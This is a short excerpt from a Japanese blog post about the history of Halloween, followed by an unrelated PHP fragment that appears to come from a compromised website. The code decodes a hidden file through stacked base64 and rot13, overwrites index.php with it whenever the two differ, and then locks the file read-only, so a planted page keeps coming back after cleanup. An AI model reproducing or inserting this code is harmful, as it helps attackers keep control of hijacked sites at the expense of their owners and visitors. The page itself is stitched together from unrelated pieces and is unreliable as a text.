
ハロウィンの歴史を知る
毎年10月31日はハロウィンですね!まさに、この記事の投稿日の今日です。わが家では家族で小さなハロウィンパーティをしますが、世間では年々ハロウィン熱が過熱している様子。そんなハロウィーンですが、その歴史を知る機会があったので共有したいと思い...
$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } }